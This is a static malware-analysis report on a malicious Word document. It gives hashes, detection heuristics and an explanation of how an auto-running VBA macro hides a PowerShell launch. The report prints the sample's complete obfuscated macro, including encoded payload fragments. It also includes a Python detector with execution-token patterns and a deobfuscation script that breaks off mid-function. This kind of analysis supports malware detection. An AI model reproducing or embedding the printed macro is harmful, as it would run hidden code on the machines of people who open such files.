Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fed4bfe887b4db55…

MALICIOUS

Office (OLE)

Size: 80.0 KB
Created: 2018-08-24 13:57:00
Authoring application: Microsoft Office Word
First seen: 2018-09-04
MD5: 52e42512e5ee3502948669046e904fd2
SHA-1: 5b9e971cbd3b4eb4e541a3da1f4bea51c2c86aa5
SHA-256: fed4bfe887b4db55db0fffc5f2d6dd8b8a0204c019ca27fbe496aa73c20b97ca
Risk score: 310

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The document carries a VBA project whose module mpYijqLwRj defines Sub AutoOpen, so the macro runs as soon as the document is opened in Word with macros enabled. AutoOpen calls CreateObject("WScript.Shell").Run with a command line assembled at run time: string literals are concatenated piecewise, the quote and the leading letter come from Chr()/ChrW() of integer arithmetic (Chr(1 + 0 + 4 + 0 + 29) is the double quote, ChrW(1 + 0 + 2 + 8 + 56) is "C"), and several never-assigned variables (IfVBtJOR, MHozuTHI, jIhVLDHFYtGT, ifNXDpTZVVw) contribute nothing because Empty concatenates as an empty string under On Error Resume Next. The window-style argument 711730862 - 711730862 is 0, so the shell window is hidden. With the cmd.exe caret escapes removed, the assembled string is a cmd /V:ON /C command that SETs a 1,062-character variable (s57W), rebuilds it in reverse one character at a time with a FOR /L loop counting from 1061 down to 0 into a second variable (tKz), and CALLs the result. The tail of the variable reads "LBAJ e- llehsrewop", so the reconstructed command starts "powershell -e JABL...": a base64-encoded UTF-16LE script (JAB is the base64 prefix that UTF-16LE text starting with "$" produces, so the script opens with a PowerShell variable). The encoded PowerShell is not decoded in this static pass; the usual purpose of such a stage, downloading and running a second-stage payload, is therefore likely but unconfirmed here. The many "Error <expression>" statements scattered through every procedure are dead code (each raises a runtime error that On Error Resume Next swallows) inserted to pad and obfuscate the macro.

Heuristics (10)

  • ClamAV: Doc.Malware.Generic-6668129-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6668129-0. This is a generic signature: it confirms the verdict but carries no family attribution.
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    Matched line in script:
      Error 82430 / jZwzi / 82867 * iLwsqS
      SLVSFXt = CreateObject("WScript.Shell") _
      . _
    The statement continues over three more lines (" _" continuations) and ends in .Run(<assembled command>, 0); see the AutoOpen listing below.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script (the same statement as OLE_VBA_WSCRIPT):
      Error 82430 / jZwzi / 82867 * iLwsqS
      SLVSFXt = CreateObject("WScript.Shell") _
      . _
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable; for this sample the source was also recovered, so the hit corroborates the source-based findings rather than standing alone.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
      Attribute VB_Name = "mpYijqLwRj"
      Sub AutoOpen()
      On Error Resume Next
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    A Windows Script Host reference (WScript.Shell) is present; it is the COM object the AutoOpen macro instantiates.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Caveat: the description does not fit this sample. A VBA project was recovered (see Extracted artifacts), and the AutoOpen token this rule matched is the Sub AutoOpen already reported by OLE_VBA_AUTOOPEN, so it adds no independent evidence here.
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. For this sample that file is macros.bas (see Extracted artifacts: mangled identifier names and chained string literals).
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    Caveat: this is the DrawingML XML namespace URI that Office writes into any document carrying drawing markup. It is not contacted at run time and is not an indicator of compromise. No macro-sourced URL was recovered; any network destination would be inside the encoded PowerShell command, which this static pass does not decode.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10927 bytes
SHA-256: 0f3dc9bb43f05af224845bc7ebd02f22fbd68a1518174291edf3d94dfab678f7
Detection: ClamAV: No threats found. The Doc.Malware.Generic-6668129-0 hit above was against the OLE container, not against the decoded macro text, so a clean scan of macros.bas does not weaken the verdict.
Obfuscation or payload: likely
148 of 240 identifiers look randomly generated (e.g. 'dwcNZCjjdtaSa'); 3 string-concatenation chain(s); consistent with name-mangling obfuscation. The chain count is the tool's own figure; the listing below shows many more assignments built from chained string literals, so treat 3 as a lower bound.
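The "identifiers look randomly generated" and "string-concatenation chain" figures above come from the analysis tool. The following Python script is an added example written for this report, not the tool's own code and not code from the sample; it re-implements, in simplified form, the report's OLE_VBA_AUTOOPEN, OLE_VBA_CREATEOBJ / OLE_VBA_WSCRIPT and name-mangling checks over decoded VBA text and runs them over two constructed inputs: MAL_SAMPLE, cut down from the AutoOpen module listed below and keeping the page's identifier names, and BENIGN_SAMPLE, an ordinary formatting macro, so the two verdicts can be compared. The keyword allowlist (VBA_KEYWORDS), the token patterns and the scoring thresholds in looks_random() and triage_vba() are the example's own assumptions, not the tool's.

```python
import re

# Allowlist so ordinary VBA words are never scored as mangled names. A real tool
# carries the full keyword and library list; this short one is the example's assumption.
VBA_KEYWORDS = set('''attribute sub function end on error resume next goto exit dim set
as new nothing if then else elseif select case for each to step in do loop while wend
with call private public static const byval byref optional declare lib alias let me
true false and or not xor mod is like integer long string variant object boolean byte
double createobject getobject shell run exec chr chrw asc ascw mid left right len
replace split join trim lcase ucase strreverse instr instrrev environ msgbox sleep
cstr cint clng vbcrlf vbnewline activedocument application thisdocument thisworkbook
wshshell wscript'''.split())
AUTO_EXEC = r'\b(?:Sub|Function)\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b'
EXEC_TOKENS = {'CreateObject': r'CreateObject\s*\(', 'WScript.Shell': r'WScript\.Shell',
               '.Run': r'\.\s*Run\b', '.Exec': r'\.\s*Exec\b', 'Shell()': r'\bShell\s*\(',
               'powershell': r'powershell', 'cmd.exe': r'\bcmd(?:\.exe)?\b',
               'URLDownloadToFile': r'URLDownloadToFile', 'XMLHTTP': r'XMLHTTP'}
STRING = r'"(?:[^"\n]|"")*"'
TERM = r'(?:%s|Chr\w*\([^()]*\))' % STRING
CHAIN = re.compile(TERM + r'(?:\s*[+&]\s*' + TERM + r'){2,}')   # 3+ literal/Chr() terms glued

# Constructed inputs. MAL_SAMPLE is cut down from the AutoOpen module listed below and
# keeps the page's identifier names; BENIGN_SAMPLE is an ordinary formatting macro.
MAL_SAMPLE = r'''
Attribute VB_Name = "mpYijqLwRj"
Sub AutoOpen()
On Error Resume Next
   Error 82430 / jZwzi / 82867 * iLwsqS
RvTnUkpqw = "MD /V" + "^:O" + "n/C " + Chr(34) + "  ^S"
wFlIwUcHf = "^et ^ ^" + "  ^" + " " + "^s" + "^5" + "7W="
SLVSFXt = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(67) + IfVBtJOR + RvTnUkpqw + wFlIwUcHf, 0)
End Sub
'''
BENIGN_SAMPLE = r'''
Attribute VB_Name = "Module1"
Sub FormatReport()
    Dim cell As Range
    For Each cell In ActiveDocument.Tables(1).Range.Cells
        cell.Range.Font.Bold = True
    Next cell
    MsgBox "Report formatted: " & ActiveDocument.Name
End Sub
'''


def looks_random(ident):
    """Crude name-mangling test: a long, non-acronym, non-keyword name with an
    unpronounceable consonant run, almost no vowels, or erratic capitalisation."""
    name = ident.replace('_', '')
    if len(name) < 6 or name.isupper() or ident.lower() in VBA_KEYWORDS:
        return False
    low = name.lower()
    consonant_run = max((len(r) for r in re.findall(r'[^aeiouy]+', low)), default=0)
    vowel_ratio = sum(c in 'aeiouy' for c in low) / len(low)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name[1:], name[2:]))  # CamelCase stays low
    return consonant_run >= 4 or vowel_ratio < 0.2 or flips / len(name) >= 0.4


def triage_vba(src):
    """Simplified re-implementation of the report's macro heuristics over decoded VBA text."""
    code = re.sub(r'\s_\s*\n\s*', ' ', src)                      # glue ' _' line continuations
    code = '\n'.join(l for l in code.splitlines() if not l.lstrip().startswith('Attribute '))
    no_strings = re.sub(STRING, '""', code)                     # never score words inside literals
    idents = {i for i in re.findall(r'\b[A-Za-z]\w*\b', no_strings) if i.lower() not in VBA_KEYWORDS}
    mangled = [i for i in idents if looks_random(i)]
    result = {'auto_exec': re.findall(AUTO_EXEC, code, re.I),
              'exec_tokens': [k for k, p in EXEC_TOKENS.items() if re.search(p, code, re.I)],
              'identifiers': len(idents), 'random_identifiers': len(mangled),
              'concat_chains': len(CHAIN.findall(code))}
    result['obfuscation_likely'] = (bool(idents) and len(mangled) / len(idents) >= 0.5
                                    or result['concat_chains'] >= 3)
    return result


if __name__ == '__main__':
    for label, sample in (('MAL_SAMPLE', MAL_SAMPLE), ('BENIGN_SAMPLE', BENIGN_SAMPLE)):
        print(label, triage_vba(sample))
```

On MAL_SAMPLE the auto-exec name, the three execution tokens and five of seven mangled identifiers are reported and the obfuscation verdict is positive; the benign macro yields no tokens and no mangled names. The identifier scoring is deliberately fuzzy (it is the same kind of judgement the tool makes), which is why string-literal contents are removed before identifiers are counted: otherwise "WScript" inside a literal would itself score as random.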
Preview script

The extracted script (the preview shows up to the first 1,000 lines; this listing ends at the End Sub of AutoOpen, so the whole extraction is shown). Three modules were recovered: the document class module dwcNZCjjdtaSa (attribute header only, derived from ThisDocument), the standard module MjMiMjXLHS holding the five string-building functions JUumPUlXL, JEnupYJwh, ObASoj, nAzzLrMfvdG and LCPiiwCsXW, and the module mpYijqLwRj holding AutoOpen. The "Error <expression>" statements between the assignments are dead code under On Error Resume Next.
Attribute VB_Name = "dwcNZCjjdtaSa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MjMiMjXLHS"
Function JUumPUlXL()
On Error Resume Next
Error UrrDWq * awfJb * EEWHY / azikIY
   Error rpthQc / YDVrr
RvTnUkpqw = "MD /V" + "^:O" + "n/C " + " " + " " + Chr(1 + 0 + 4 + 0 + 29) + "  ^S"
Error HSIvV * 27348
   Error wswzf * BQjiU / 48649 / RzdYaw
   Error Ozohi * HjidCI
wFlIwUcHf = "^et ^ ^" + "  ^" + " " + "^s" + "^5" + "7W=A^A" + "C^A^g^" + "A^A^IA"
Error 70425 * vpmwmM * wzmFU * wXisO
   Error KMJLp * BEcJLX / 25785 / DIsEO
ChVvMLAw = "^A" + "C" + "^" + "AgA^A" + "IA^AC" + "^A^g" + "^AAIA" + "AC^A" + "g^A^" + "AIA^A" + "C"
Error XnVzjh / 1836
   Error 38139 * kDzrt
   Error hHzsPq / 76287 * 98655 * zfoWqs
   Error cQzLr / IkMnq * plATMk * luJlO
   Error LfTQj / bGDLKW
AvdfVwn = "A^gAA^" + "IA" + "A" + "CA^g^" + "AQf^A0" + "HA7" + "B^AaAM" + "G" + "A0B" + "^QYAMG" + "A^9" + "BwO" + "^A^sG^A"
Error lkapN * 99200 * 45894 * ZpnDtW
GSPzOPKc = "^h^B^" + "QZ^A" + "I^HA^i" + "B^w^OA8" + "G^A^" + "m^Bgc^A" + "^QCA"
Error CPiRk / nHaOZS
   Error rAiLo * pBAni
   Error 55695 * RzadYj
   Error 71956 / 96558 / 38634 * FfEtzC
   Error 68818 / zzXAl
qslmPuilR = "^gA^Qb^" + "A^" + "UG" + "^A0" + "BQ^S" + "A0CA" + "l^B^w" + "^aA8" + "GA" + "^" + "2^BgbAk" + "E^"
Error iNSJG / azziS / XTmKVA / PpzSfh
   Error cjPoci / JzXstY
olNSo = "A7^AQ^" + "KA^" + "8^G" + "^AmB" + "gcAQC^A" + "^gAAL^" + "Ak" + "^F^AvB"
Error QBwiLR / dCZojf / ncjVwS / 67848
   Error 80646 / lJnnd
aDwvOGvzwq = "Q^SA" + "QC^A^" + "oAQ" + "^Z^A^wG" + "^A^pB^" + "gRAQGA"
Error CMCdk / hLzlmC
   Error 66094 * fRHsj / 64656 / lrDIW
   Error BdvAvz * jSrJrt * nVzGmi * fiDMwW
   Error iEjQK / IUDXL
lJDssGCIbk = "^h" + "B^wb^Aw" + "^G" + "AuBwdA" + "^8^GA^" + "EB^gLA^" + "I^GA^" + "0"
Error 11879 * 57988 * 68207 * OsIdK
   Error zsabY / BipPJ / ftCpd * DZPzT
   Error BGFTMO * VLSVdo
   Error YQQVwF / YzPWu * 85811 * wdhwIL
aOBwVU = "Bw" + "SAQC" + "A" + "^7^BQ" + "^" + "e^A"
JUumPUlXL = RvTnUkpqw + wFlIwUcHf + ChVvMLAw + AvdfVwn + GSPzOPKc + qslmPuilR + olNSo + aDwvOGvzwq + lJDssGCIbk + aOBwVU
   Error 95575 / DYJzE
   Error rMwUi / jjQoEU * DaoKt * wwwqFR
   Error vwQwO / 8269 / 20672 * DiZGN
   Error 28557 * zzbYw / 36593 * OVJum
End Function
Function JEnupYJwh()
On Error Resume Next
Error SjjiWv / SJYwW / kwFTmQ * WrDNla
   Error 10575 / dPQMl
SDbJZwBI = "^I^HA" + "^0" + "B^w^e^A" + "kC^" + "Av^BQT" + "^A" + "^oGAk" + "A^AI^" + "A4G"
Error wsUYb / iJzaUj
   Error oHPdp / aNGZB
nUCfhwz = "^ApB^A^" + "IA^kF^A" + "v" + "BQS" + "A" + "^" + "QC" + "^A^o^A" + "A^" + "aA^M^" + "GAh^B"
Error hsnNY / MMPCwu
   Error 62685 / swiUt
dhWIDUzD = "^Q^" + "Z^AIH" + "^A" + "v^B" + "^g^" + "Z" + "A^sD" + "^AnA^"
Error 94245 * vuuNdT / 40655 * bbmjoY
   Error wbJPq * 64109
PEuXmr = "QZ" + "^A^g^H" + "^A^l" + "^B" + "g^L^A" + "cCArA^A" + "R" + "^A" + "IGA^i^"
Error UTjGjK * CwGTq / 35533 / PYUhf
   Error 61376 * GLiijm * 91942 / Siwzj
   Error 70168 * EiPjV
WaFUHVW = "B" + "A" + "^JA^s" + "CA" + "n^A^" + "AXAcC" + "^A" + "rA^wYAk" + "^GAs^"
Error 101 * tJATYb * 10110 * dCWoS
   Error 44989 * 49130
   Error vdwDF / SDkXUW * Fwhzaf / ojVSC
   Error zrAkcF * SkiHzu / 24935 * UzmCIj
pGttoVFBWc = "BgY^A" + "^UH^" + "A" + "^wBg^OA" + "^Y^H^A" + "^uBQ^Z" + "A" + "^QC" + "A^9^Aw^" + "b"
Error pEvEq * 4759
   Error OCEFiB / bMIjB * 36624 / jKaXAz
LJYQHH = "^" + "AYG^" + "A" + "^y^B^A" + "J^As^"
Error sLslfo * 9114 / SVztw / BDKiRz
wiGDcBBh = "D^AnAQN" + "^AA^" + "DAx^" + "Aw^J" + "^AAC^" + "A9AA" + "^I^A" + "QE^Ai^B" + "g^Y^A^" + "QC^A" + "7^AQ^K" + "A" + "cC^A^A^"
Error cONAKd / 21190
qzCVKFChqA = "Bw^J" + "^A^gCA" + "^0BQa^A" + "^" + "wGAw" + "B^w^U" + "A^4C" + "An^A^Qb" + "^A^M^" + "H^" + "Ak^Bg^Y" + "^A^gE" + "^A"
Error 37594 / OtSSQW
   Error asEVVF * 65744 * 53441 * HqGtA
   Error 550 / 24451
TtKjFOW = "v^" + "AwcA^Q^" + "G" + "^A" + "hB" + "^wbA^w^" + "GAw" + "B" + "Q^" + "d" + "^" + "A^8CA^" + "0^B"
Error XKVli * 51672
   Error oHVlsm / LdSiv / wrRLHW * QcfhRl
JLnltD = "^g" + "^b" + "AUG^A" + "^0" + "^Bg" + "^" + "bA^8G" + "^"
Error HSnoT * 92825 / 87131 / AjQKi
   Error 33742 / jFSsQw * 43871 * WFGpow
   Error 12772 * OEzhXN / BnwbAE * wtiLb
kSROHDFCF = "AjBQ^L^" + "AA" + "H" + "A3BwLAU" + "^G^A0B^" + "QaA" + "MHA" + "i^BQ^" + "ZAc" + "HA" + "vA^Q" + "^bA8G^" + "Aj^"
JEnupYJwh = SDbJZwBI + nUCfhwz + dhWIDUzD + PEuXmr + WaFUHVW + pGttoVFBWc + LJYQHH + wiGDcBBh + qzCVKFChqA + TtKjFOW + JLnltD + kSROHDFCF
   Error omPKqZ / iwvGJ * CJvtSN * 79847
   Error MGmJs * 8670
End Function
Function ObASoj()
On Error Resume Next
Error fkKsBz / 80200
   Error zqPaq * rPiotz
   Error bRsSm * nqABwc / 22641 * 13179
jzPJksJW = "B^" + "gL^A" + "^Q^D^Av" + "^Bgc^" + "A^A" + "^HAl^B" + "gc^A8C" + "^Av^Ag^" + "O^" + "AA^H^" + "A^0BAd" + "^A"
Error 98525 / FGHwa / 94673 / KliEtj
qLRizBfD = "g^" + "G^AA" + "^BA" + "^W^" + "A^M" + "DAvA^Q" + "bA^8GAj" + "^"
Error Liwri / jABFo / WzjjK / czuJl
   Error 92423 / tNUWUD / DizFm * zXnoSa
   Error 53929 * HopXP / 19403 * FMdSqi
QJSlJt = "B" + "^gL" + "A^w^G^" + "A^pB^wc" + "A^" + "EG" + "Ay^B^" + "g" + "^Y^" + "A8G^Ak"
Error cwIZG / GBzGv
NhNvnC = "^B^gY^" + "A^IH^" + "Ah^BQb^" + "A^8CAvA" + "g" + "^O^A^" + "A^H^A^" + "0BAd^" + "A" + "^g^" + "GA^A^Bg" + "c^" + "A^s^G"
Error 40740 / wAUHoT * Qzsszw / 24296
   Error 92730 / zwqsTB / JhoFk * qWkBbv
   Error frBYsl / QpoIX
   Error 74862 / hfKazL / 70545 * ostuAc
   Error jiklw * PmaXX / bGVSPt / lkXNvz
tihwjXP = "^Ar^" + "B^" + "QOAYHA" + "^2^BAb" + "^A^kDAv" + "A"
Error WwjZq * obZoEv
   Error AtdRXI / NOzuLu / 10707 * iOLWK
   Error 90433 * WRVAU / QNfzqJ / wTRbhS
   Error 59639 * AEoKa
   Error LjJBSs * rjirFZ
   Error 60973 * dkaKLh * wBBpW * QzDOZP
hCnlbWjFqz = "gc^" + "A" + "^Y^G" + "^A^u^" + "Awc^A^" + "E^" + "GAr^B^" + "Qd^A^w" + "G^AuA^Q" + "^MA"
Error jhVVcN / wJbXbd
   Error QlGcr * snYbln / 9036 * KELtYz
   Error dOjVXz / MrTFtk
   Error ViCWU * zcPhUF * PWsLq * WRDcq
   Error MqHYBY / WVfEa * JPdRk * iisdq
TwQIwWqw = "A" + "^H" + "A3^Bw" + "LA^8C" + "A^6^" + "A^AcAQH" + "A0" + "^BA" + "aA" + "AEA"
Error 39013 / CUMQd
mQfUavVbEI = "2A^wc" + "A8C^A" + "t^B^wb" + "A^M^G" + "^AuA^" + "Q" + "YA^kH^A" + "^h^Bg" + "^Y" + "AE^G^" + "AyBQ" + "^dA" + "^M^H^"
Error 54931 / wKGbo * hIMLAL * jnXYjS
vlYHwQij = "A" + "w^B^w^b" + "AQ^H^A" + "h^B" + "gcAE^GA" + "^j" + "B^QYA" + "c^"
Error cJuhbz / EQnZt
   Error LiiavU / 7706 / 53887 * MtYMf
zTORLz = "G^A^u^" + "B^QZ^A" + "^A" + "^" + "H^" + "Au" + "^A^g^" + "bA" + "E^G^A" + "p^BQ^Y^"
ObASoj = jzPJksJW + qLRizBfD + QJSlJt + NhNvnC + tihwjXP + hCnlbWjFqz + TwQIwWqw + mQfUavVbEI + vlYHwQij + zTORLz
   Error 15156 / HOKdJI
   Error 71735 * IQzctO / NEkmnR * UHKdG
   Error WGbTQ / jkBNLh
   Error KjnCSS * bLcSdJ / SQFpRt / 26046
End Function
Function nAzzLrMfvdG()
On Error Resume Next
Error QDdqG * dcuvwA
   Error 96827 * Yaabsz
   Error vSlIVP / 68620
   Error zLliH / kbLRmZ
   Error ToEusH * Sfrct / 63967 / ZwzoQS
qMMwjAdXHI = "AI^" + "H^A^" + "l^B^" + "w^Y" + "^AI^H" + "^A" + "^l^B^A"
Error vlUud * IKtOi * 21886 / VaSKt
HjDQGQfG = "c" + "AE^G^A" + "^yB" + "Q" + "^YA^" + "M^"
Error INzJhD * KGHiYw
jvQUAZSu = "G^AhB^w" + "Z^A4^" + "G^A^" + "lB^Ac" + "^A8C^" + "Av^Ag" + "OAA^" + "HA" + "^"
Error kwbfF / InXUl * PcAnGA / MRXWnl
   Error 92141 * 45743 * 14904 * oArPdf
BFNOsJdr = "0B^A" + "^d" + "^A^gGA" + "A^B^wRA" + "A^F^" + "AiB^w" + "c^A"
Error 61237 / mMiMAE
   Error 85673 / zWiGz / 92485 * icYOn
pYPaqEzU = "s^G^A^" + "G^B" + "^Q^b" + "A^I^H" + "Av^AQ" + "Z" + "A^sG^Au" + "^A" + "w^b^AM" + "^G" + "Au^A" + "wcA^Q"
Error 48037 / rwAZf
   Error OoMbou * 90063 / QWZwG / SjoIib
   Error 84677 / 24502 / 78626 * msJjjq
   Error 57885 / XuGcj * 46891 / jLviC
mRnjIWh = "^H^A^uB" + "^QdA" + "8G^" + "A" + "t^B" + "^g^Y" + "AU" + "^G^" + "A^3B^" + "wLA8C" + "A6AAc^A"
nAzzLrMfvdG = qMMwjAdXHI + HjDQGQfG + jvQUAZSu + BFNOsJdr + pYPaqEzU + mRnjIWh
   Error FRwzQB * lTUAS * 19075 * 62052
   Error UfnUPR / JkGUv
End Function
Function LCPiiwCsXW()
On Error Resume Next
Error 22223 / 55168 * jGihF / nhjMT
   Error RDWODC / OpzlV
   Error 94097 * rsaQC
   Error 74461 / 66531
GFsFajN = "Q^HA0" + "B" + "^Aa^Ac" + "CA^" + "9" + "A^w" + "bA0E" + "A^q^BA" + "^J^AsD" + "A" + "0B^g^"
Error 70280 * Poirj * RiHsvF / 17149
   Error 35307 * zfodw / JfqQt / bUsAnz
   Error ibBUQz * YOaZm
   Error AFOwW / 53973 * 73179 / TOKwi
MkSwaJAG = "b^A^UG^" + "ApBA^b^" + "AM^E^" + "A^iBQZ^" + "AcF^" + "Au^A^A" + "^dAU^G" + "^A^" + "O^BAIAQ" + "HA^" + "j" + "BQ^Z^A^" + "oGA"
Error HFirlw * KIkGw
   Error IOozu / FfHSHw
   Error iNmdb * dZzjB * nwZUHS * 94150
   Error SBzWr / GthsFo / Sfjid / oWHDl
YatkbnMcwGj = "^i^B^" + "wb" + "A" + "0CA3" + "^BQ" + "ZA^"
Error OhiXrE * zOirLM / iYHLI / MzrlEj
   Error 55156 / Yqmzb * 5952 * bFdatv
iqDwwc = "4^G" + "^A^9A" + "^" + "g^Y" + "A^Q^H^A" + "L^BA" + "^J^ ^e-"
Error tkKqtY / ksSCW / Thnbl / ptSHr
   Error 32502 * MjzUt
   Error zWHNrf / zObws
RufGROVWZE = " ^l^l^" + "eh^sr^" + "ewo^p& " + "f^" + "oR " + " /^L %" + "^G ^"
Error 50634 * SCMasd * aXDHEG / iRoMsF
   Error AMRKXL / iwWjiZ
   Error RVArKr / 16933
zVzvBSwQj = "IN " + "(^ ^" + " ^ " + " ^10" + "^61" + ",^  ^ ^" + "-1^" + " ^ ^" + "  ^"
Error 66770 * mTEsYH / 76681 / qNoUm
   Error 32946 / wfqHAj
   Error 71267 * 82851 / BSmRW / qQIJr
sSzKLYcPj = ",^ 0 ^" + "  ^ )" + "d^O " + "  " + "^sE" + "^t   " + "  ^t^Kz" + "=!" + "^t^Kz!!"
Error QzwHCk * znrnZ / jPiaM / NzwQlt
   Error UXzuzR * SDDrK / cTLtFQ * iFwZQJ
huNcjHHpdDr = "^s^5" + "7W:" + "~    %" + "^G,   1" + "!&&  ^" + "i^F  " + "%^G  " + "  L^" + "E^Q  "
Error 42215 / CRqIw / NzDjAi / hKOqp
   Error aZinD / BFHjHv
azMal = "^" + "0 ca^l^" + "L  %" + "^t^Kz" + ":~^ ^ ^" + "-^1" + "^06" + "2%     " + " " + "  " + Chr(1 + 0 + 4 + 0 + 29) + "   "
LCPiiwCsXW = GFsFajN + MkSwaJAG + YatkbnMcwGj + iqDwwc + RufGROVWZE + zVzvBSwQj + sSzKLYcPj + huNcjHHpdDr + azMal
   Error 71595 * 57924
   Error aaHCC * 65385
   Error 95241 * CvTqLm * 88853 / JmntTi
   Error NAWlh / brEiE / 52961 / OTCDv
   Error VRFFzK / 78098 * TXRjm * 15562
End Function


Attribute VB_Name = "mpYijqLwRj"
Sub AutoOpen()
On Error Resume Next
   Error 50877 * 69896
   Error 80640 * 76323
   Error 82430 / jZwzi / 82867 * iLwsqS
SLVSFXt = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(1 + 0 + 2 + 8 + 56) + IfVBtJOR + MHozuTHI + JUumPUlXL + JEnupYJwh + ObASoj + nAzzLrMfvdG + LCPiiwCsXW + jIhVLDHFYtGT + ifNXDpTZVVw, 711730862 - 711730862)
   Error BItcCs * JRPFk * 8988 / NKnLXW
   Error 85878 / 36976
   Error 33721 * 64194 / LaCWB * hOhOnK
   Error qYWif * Qczzz
End Sub
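To recover the command line the AutoOpen macro above hands to WScript.Shell.Run without executing any of it, an analyst only has to emulate the handful of VBA and cmd.exe features the obfuscation relies on. The following Python script is an added example written for this report, not output of the analysis tool and not the sample's own code. It runs against SAMPLE_VBA, a constructed and much shorter macro built in the same shape as the listing above (its module, function and variable names are made up), whose hidden command is "powershell -e SQBFAFgA" (base64 of the UTF-16LE text "IEX"). It resolves the string concatenations, the Chr()/ChrW() arithmetic and the never-assigned names, strips the cmd.exe caret escapes, replays the SET / FOR /L / CALL reversal, and finally base64-decodes the -e argument. The same functions accept the full macros.bas listing, since it uses exactly these constructs; the encoded PowerShell that results for the real sample is not reproduced here.

```python
import base64
import re

# Constructed sample (not the page's macro) with the same building blocks: literal
# concatenation, Chr() of integer arithmetic, never-assigned names, and a cmd.exe line
# that SETs a reversed payload and rebuilds it with FOR /L. Hidden: powershell -e SQBFAFgA
SAMPLE_VBA = r'''
Attribute VB_Name = "aBcDeFgH"
Function Qwerty()
On Error Resume Next
Error 12345 * zzz / yyy
Part1 = "MD /V" + "^:O" + "n/C " + Chr(1 + 0 + 4 + 0 + 29) + " ^S^et ^s^57W=Ag^FAF" + "BQ^S e^- ^l^l^"
Part2 = "eh^sr^ewo^p& " + "f^oR /^L %^G IN (" + "2^1, -1, 0) d^O ^sEt tKz=!^tKz!!"
Part3 = "^s57W:~%^G,1!&& i^F %G LEQ 0 ca^lL %^tKz:~-2^2%" + Chr(1 + 0 + 4 + 0 + 29)
Qwerty = Part1 + Part2 + Part3
End Function
Attribute VB_Name = "ZxCvBn"
Sub AutoOpen()
On Error Resume Next
Obj = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(1 + 0 + 2 + 8 + 56) + NotDefined + Qwerty + AlsoMissing, 711730862 - 711730862)
End Sub
'''
TOKEN = re.compile(r'"(?P<lit>(?:[^"]|"")*)"'               # string literal
                   r'|(?P<chr>ChrW?)\s*\((?P<arg>[^()]*)\)'  # Chr(n) / ChrW(n)
                   r'|(?P<name>[A-Za-z_]\w*)'                # variable or function
                   r'|(?P<comma>,)')                         # Run's 2nd argument starts
ARITH = re.compile(r'^[\d\s+\-*/]+$')                        # allowed Chr() argument

def parse_vba(src):
    """Collect 'name = expr' assignments (scope ignored) and the .Run argument text."""
    src = re.sub(r'\s_\s*\n\s*', ' ', src)                   # glue ' _' line continuations
    assigns, run_args = {}, None
    for line in src.splitlines():
        m = re.match(r'\s*([A-Za-z_]\w*)\s*=\s*(.*)$', line)  # Error/Attribute lines have no '='
        if not m:
            continue
        run = re.search(r'\.\s*Run\s*\((.*)\)\s*$', m.group(2))
        if run:
            run_args = run.group(1)
        else:
            assigns[m.group(1)] = m.group(2)
    return assigns, run_args

def eval_expr(expr, assigns, seen=()):
    """Concatenate a VBA string expression statically; no VBA is executed."""
    out = []
    for m in TOKEN.finditer(expr):
        if m.group('comma'):
            break
        if m.group('lit') is not None:
            out.append(m.group('lit').replace('""', '"'))
        elif m.group('chr'):
            if not ARITH.match(m.group('arg')):
                raise ValueError('unexpected Chr() argument: ' + m.group('arg'))
            out.append(chr(int(eval(m.group('arg'), {'__builtins__': {}}, {}))))  # digits/ops only
        else:
            name = m.group('name')
            if name in seen:
                raise ValueError('recursive reference: ' + name)
            # A never-assigned name is Empty in VBA and concatenates as "" (the macro relies on that).
            out.append(eval_expr(assigns[name], assigns, seen + (name,)) if name in assigns else '')
    return ''.join(out)

def decode_cmd(cmdline):
    """Strip caret escapes, then replay SET / FOR /L / CALL to get the reversed payload."""
    plain = cmdline.replace('^', '')                          # '^' escapes the next character
    var = re.search(r'set\s+(\w+)=([^&]*)', plain, re.I)
    loop = re.search(r'for\s+/L\s+%(\w)\s+in\s*\(\s*(-?\d+)\s*,\s*(-?\d+)\s*,\s*(-?\d+)\s*\)'
                     r'\s*do\s+set\s+(\w+)=!\5!!(\w+):~\s*%\1\s*,\s*1!', plain, re.I)
    call = re.search(r'call\s+%(\w+):~\s*(-?\d+)%', plain, re.I)
    if not (var and loop and call):
        raise ValueError('SET / FOR /L / CALL reversal pattern not found')
    value, g, step, stop = var.group(2), int(loop.group(2)), int(loop.group(3)), int(loop.group(4))
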